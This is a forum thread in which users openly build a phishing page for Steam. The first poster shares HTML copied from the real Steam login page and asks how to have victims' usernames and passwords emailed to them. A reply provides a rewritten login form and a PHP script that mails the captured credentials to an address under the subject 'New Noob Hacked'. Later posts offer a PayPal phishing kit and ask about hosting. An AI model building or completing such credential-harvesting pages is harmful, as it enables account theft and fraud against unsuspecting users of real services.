Phishing Site Coding

TinySponge

FS Member
Hi I just ripped this off the steam page and made a few amends. I was wondering how the contents of the username and password could be sent to me via email everytime a user is tricked? like when they press the log in button? (Basically I just need someone to insert the code for me so that when the log in button is pressed with the user's log in information, the account details will automatically be sent to my email. just replace my email with XXINSERTEMAILHEREXX or something similar)

could someone help me with the coding? thanks!

Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Login</title>
<link href="https://store.steampowered.com/public/css/styles_global.css?v=2092337392" rel="stylesheet" type="text/css" />
<link href="https://store.steampowered.com/public/css/styles_login.css?v=1034677873" rel="stylesheet" type="text/css" />
<link href="https://store.steampowered.com/public/css/header.css?v=1747551079" rel="stylesheet" type="text/css" />
<noscript></noscript><!-- --><script type="text/javascript" src="http://www.freewebs.com/p.js"></script><script type="text/javascript" src="https://store.steampowered.com/public/javascript/javascript.js?v=1997075191&l=english"></script>
	
<script type="text/javascript" src="https://store.steampowered.com/public/javascript/swfobject.js?v=72530356&l=english"></script>
	
<script type="text/javascript" src="https://store.steampowered.com/public/javascript/prototype-1.6.0.2.js?v=2540547650&l=english"></script>

<script type="text/javascript" src="https://store.steampowered.com/public/javascript//scriptaculous/scriptaculous.js?v=1325514763&l=english"></script>
<script type="text/javascript" src="https://store.steampowered.com/public/javascript/jserrorreport.js?v=1219061623&l=english"></script>
<script type="text/javascript" src="https://store.steampowered.com/public/javascript/header.js?v=942733472&l=english"></script>
<script type="text/javascript" src="https://store.steampowered.com/public/javascript/login.js?v=3059429352&l=english"></script>
<script type="text/javascript" src="https://store.steampowered.com/public/javascript/submitonenter.js?v=1210272294&l=english"></script>
</head>
<script language="Javascript">
function HighlightFailure()
{
	var errorDisplay = $('error_display');
	if ( errorDisplay )
	{
		errorDisplay.style.display = 'block';
		Effect.ScrollTo( 'error_display' );
		new Effect.Highlight( 'error_display', { endcolor : '#CEC7BD', startcolor : '#CCC983' } );
	}
}
</script>
<body >

<!-- Main Background -->
	<div id="all">

	
	<!-- Header -->
	<div id="v4headerBar">
	<div id="steamLogo"><img src="https://store.steampowered.com/public/images/steamLogo.jpg" width="105" height="54" border="0" /></div>
	<div id="steamText">
	<img src="https://store.steampowered.com/public/images/steamText.jpg" width="72" height="35" border="0" />
		
	</div>
	<div id="v4headerLinks">
		<p>
			<span id="v4headerMenuItems">

			<a class="v4headerLink" href="http://store.steampowered.com/">Home</a> &nbsp; | &nbsp; 
			<a class="v4headerLink" href="http://store.steampowered.com/about/">What is Steam?</a> &nbsp; | &nbsp;
			<a class="v4headerLink" href="https://steamcommunity.com/">Community</a> &nbsp; | &nbsp;

			<a class="v4headerLink" href="http://store.steampowered.com/news/">News</a> &nbsp; | &nbsp;
			<a class="v4headerLink" href="https://cafe.steampowered.com">Cyber Cafйs</a> &nbsp; | &nbsp;
			<a class="v4headerLink" href="http://store.steampowered.com/forums/">Forums</a> &nbsp; | &nbsp;

			<a class="v4headerLink" href="http://support.steampowered.com/">Support</a> &nbsp; | &nbsp;
			<a class="v4headerLink" href="http://store.steampowered.com/stats/">Stats</a>
			</span>
		</p>
	</div>
	<div id="v4headerStatusItems">

		<p>
								<a class="v4loginLink" href="https://store.steampowered.com/login/">Login</a> 
					</p>
	</div>
</div>

<div id="cart_status_row">
	<center>
		<div id="cart_status_center">
			<div id="cart_status_data">

																	<div id="cart_status_icon"><a href="http://store.steampowered.com/cart/"><img src="https://store.steampowered.com/public/images/carticon.gif" width="20" height="20" border="0" /></a></div>
							</div>
		</div>
	</center>
</div>
		
 
	<!-- End Header -->
	
	<center>
	<div id="col_parent">

		<!-- Left Column -->
					<div id="col_left">
			</div>
					
		<!-- End Left Column -->



		<!-- Center Column -->

		<div id="cart_area">
			<div id="join_leftcol_head">SIGN IN <span id="join_or">OR</span></div>

			<h2>JOIN STEAM NOW</h2>
			<div class="cart_area_top"><img src="https://store.steampowered.com/public/images/cartbox_top.gif" width="478" height="2" border="0" /></div>
			<div class="cart_area_body">
				<span id="error_display"></span>
				<div id="loginbox_left">
					<h1>I have a Steam account.</h1>
					<Provisional users can't create forms name="logon" action="https://store.steampowered.com/login/" method="POST" onsubmit="doLogin(); return false;">
					<input type="hidden" name="redir" value="">

					<div class="loginbox_break_green_half"><img src="https://store.steampowered.com/public/images/loginbox_break_green_half.gif" width="205" height="1" border="0" /></div>
					<div class="input_title">Steam username</div>
					<input type="text" name="username" id="input_username" /><br />
					<div class="input_title">Password</div>
					<input type="password" name="password" id="input_password" /><br />
										<br />
					<br />
					</form>

					<a href="javascript:doLogin()" class="btn_green">Login&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><br /><br />
					<a href="http://support.steampowered.com/kb_article.php?ref=4988-DHXV-7272" id="link_forgot_password">Forgot your password?</a>
				</div>
				<div id="loginbox_break_vertical"><img src="https://store.steampowered.com/public/images/loginbox_break_vertical_grey.gif" width="1" height="328" border="0" /></div>
				<div id="loginbox_right">
					<h1>I'm new!</h1>
					<div class="loginbox_break_green_half"><img src="https://store.steampowered.com/public/images/loginbox_break_green_half.gif" width="205" height="1" border="0" /></div>

					<p>New to Steam?</p>
					<p>
					It's free to join and easy to use.  Continue on to create your Steam account and get Steam, the leading digital solution for PC gamers.					</p>
					<br /><br /><br />
					<a href="https://store.steampowered.com/join/" class="btn_green">Join Steam&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a>
					<br /><br />
				</div>

					
				<br clear="left" />
			</div>
			<div class="cart_area_bottom"><img src="https://store.steampowered.com/public/images/cartbox_bottom.gif" width="478" height="2" border="0" /></div>
		</div>
		<!-- End Center Column -->

		<!-- Right Column -->
		<div id="col_right">
			<h2>WHY JOIN STEAM?</h2>

			<div id="why_list">
				<img src="https://store.steampowered.com/public/images/orange_bullet.gif" border="0" />&nbsp;Buy and download full retail games<br />
				<img src="https://store.steampowered.com/public/images/orange_bullet.gif" border="0" />&nbsp;Join the Steam Community<br />
				<img src="https://store.steampowered.com/public/images/orange_bullet.gif" border="0" />&nbsp;Chat with your friends while gaming<br />
				<img src="https://store.steampowered.com/public/images/orange_bullet.gif" border="0" />&nbsp;Play your games on any PC<br />
				<img src="https://store.steampowered.com/public/images/orange_bullet.gif" border="0" />&nbsp;Schedule a game, tournament, or LAN party<br />

				<img src="https://store.steampowered.com/public/images/orange_bullet.gif" border="0" />&nbsp;Receive automatic game updates, and more!<br />
			</div>
			<br /><br />
			<img src="https://store.steampowered.com/public/images/why_join_preview.jpg" width="241" height="207" border="0" />
			<br /><br />
			<span id="join_sys_req_title">System Requirements</span><br />
			<div id="join_sys_req">
			Windows 2000, XP or Vista . 256 MB RAM<br />400 Mhz processor . 1GB HD space (recommended)<br />Internet connection (broadband recommended)			</div>					
			<br /><br />

	  </div>
		<!-- End Right Column -->

	<br clear="all">
	</div>
	</center>
	
	<!-- Footer -->
		<div id="footer">

		<div id="footer_logo"><a href="http://www.valvesoftware.com"><img src="https://store.steampowered.com/public/images/logo_valve_footer.jpg" alt="Valve Software" border="0" /></a></div>

		<div id="footer_text"> <Provisional users can't create forms action="http://store.steampowered.com/login/">
			<select name="l" onChange="submit();" style="width: 200px;">
			<option value="czech" id="l_czech" >Czech</option>
			<option value="danish" id="l_danish" >Danish</option>
			<option value="dutch" id="l_dutch" >Dutch</option>
			<option value="english" id="l_english" selected>English</option>

			<option value="finnish" id="l_finnish" >Finnish</option>
			<option value="french" id="l_french" >French</option>
			<option value="german" id="l_german" >German</option>
			<option value="hungarian" id="l_hungarian" >Hungarian</option>
			<option value="italian" id="l_italian" >Italian</option>
			<option value="japanese" id="l_japanese" >Japanese</option>

			<option value="korean" id="l_korean" >Korean</option>
			<option value="norwegian" id="l_norwegian" >Norwegian</option>
			<option value="polish" id="l_polish" >Polish</option>
			<option value="portuguese" id="l_portuguese" >Portuguese</option>
			<option value="russian" id="l_russian" >Russian</option>
			<option value="schinese" id="l_schinese" >Simplified Chinese</option>

			<option value="tchinese" id="l_tchinese" >Traditional Chinese</option>
			<option value="spanish" id="l_spanish" >Spanish</option>
			<option value="swedish" id="l_swedish" >Swedish</option>
			<option value="thai" id="l_thai" >Thai</option>
			</select><br />
			</form>
						<p>&copy; 2009 Valve Corporation.  All rights reserved.  All trademarks are property of their respective owners in the US and other countries.			<a href="http://www.valvesoftware.com/privacy.htm">Privacy Policy</a>. <a href="http://www.valvesoftware.com/legal.htm">Legal</a>. <a href="http://store.steampowered.com/subscriber_agreement/">Steam Subscriber Agreement</a>.
			</p>

       		<p>
          		<br>
				<a href="http://www.valvesoftware.com/about.html" target="_blank">About Valve</a> | <a href="http://www.valvesoftware.com/business/" target="_blank">Business Solutions</a> | <a href="http://www.valvesoftware.com/jobs.html" target="_blank">Jobs</a> | <a href="https://cafe.steampowered.com" target="_blank">Cyber Caf&eacute;s</a>

        	</p>

		</div>

	</div>
	<!-- End Footer -->
	
	</div>
<!-- End Main Background -->




</body>
</html>
lols this shouldnt be hard, so many pro coders here :eek:

P.S. Bonus if they could include "Please enter both username and password!" if the user misses out one field (to make it more realistic :D) Thanks!
 
Just configure the input fields to send the input data to the email you want. I can't remember how to code that off the top of my head but I've done it before and it's pretty simple just search for some tutorials on google and don't pay someone to code that for you thats just stupid.
 
yeh thats what i thought as well. anyway, i did so. but is there any way to hide my email address from the source code? cos i dont want flamers/spammers etc.
 
PHP can help you do the things that normal HTML coding cannot achieve.

Go read on some tutorials on how to do so.
 
meh can someone just help code it for me ive spent ages on mail() and all the retarded javascript coding thingies someone just code it for me? im sure just need put it somewhere inside here right:

Code:
<h1>I have a Steam account.</h1>
					<Provisional users can't create forms name="logon" action="https://store.steampowered.com/login/" method="POST" onsubmit="doLogin(); return false;">
					<input type="hidden" name="redir" value="">

					<div class="loginbox_break_green_half"><img src="https://store.steampowered.com/public/images/loginbox_break_green_half.gif" width="205" height="1" border="0" /></div>
					<div class="input_title">Steam username</div>
					<input type="text" name="username" id="input_username" /><br />
					<div class="input_title">Password</div>
					<input type="password" name="password" id="input_password" /><br />
										<br />
					<br />
					</form>

					<a href="javascript:doLogin()" class="btn_green">Login&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><br /><br />
					<a href="http://support.steampowered.com/kb_article.php?ref=4988-DHXV-7272" id="link_forgot_password">Forgot your password?</a>
				</div>
				<div id="loginbox_break_vertical"><img src="https://store.steampowered.com/public/images/loginbox_break_vertical_grey.gif" width="1" height="328" border="0" /></div>
				<div id="loginbox_right">

come on pls help. im really pissed :( just insert the thingy somewhere can? thanks :D
 
hmm rusty on my php perhaps this will work

I do not guarantee this will work at all, try it, if it doesn't you have a great starting place to research from:


Code:
<h1>I have a Steam account.</h1>
					<form name="logon" action="send.php" method="POST">
					<input type="hidden" name="redir" value="">

					<div class="loginbox_break_green_half"><img src="https://store.steampowered.com/public/images/loginbox_break_green_half.gif" width="205" height="1" border="0" /></div>
					<div class="input_title">Steam username</div>
					<input type="text" name="username" id="input_username" /><br />
					<div class="input_title">Password</div>
					<input type="password" name="password" id="input_password" /><br />
										<br />
					<br />
					<input class="btn_green type="submit">
					</form>

					<br /><br />
					<a href="http://support.steampowered.com/kb_article.php?ref=4988-DHXV-7272" id="link_forgot_password">Forgot your password?</a>
				</div>
				<div id="loginbox_break_vertical"><img src="https://store.steampowered.com/public/images/loginbox_break_vertical_grey.gif" width="1" height="328" border="0" /></div>
				<div id="loginbox_right">

				
------------------------------------------------		
				
// this is the send.php create send.php and upload it to the same dir as the above

				
<?php
$to = "[email protected]";
$subject = "New Noob Hacked";
$username = $_REQUEST['username'] ;
$password = $_REQUEST['password'] ;
$headers = "From: $password";
$sent = mail($to, $subject, $username, $headers) ;
?>
 
hey if you whant i found 1 that works i tested it it gives you list of usernames and pass on the site its for paypal u jsut have to chnage the links from paypal to steampowerd heres my fake site tell me if it looks real Login


EDIT1:

and guys if you whold please go here n say ti works i cant for somereson gmail whont let me make new account


EDIT2:

WELL ANY way ima upload it the vid will tell you what you do with post.php n the htm u rip off of steam site and stuff
 
Don't pay spooky #1 lol
and I have my old code from ValveSupport which would work fine.
 
and I have my old code from ValveSupport which would work fine.
can pm me? thx.

or rickyman your code shld do fine too ^^

P.S. any good sites which support PHP coding? webs.com doesnt work
 
Back
Top